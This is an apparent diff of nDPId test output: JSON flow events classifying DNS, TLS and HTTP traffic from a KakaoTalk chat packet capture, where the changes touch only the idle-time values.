00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00941{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 
+00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00941{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 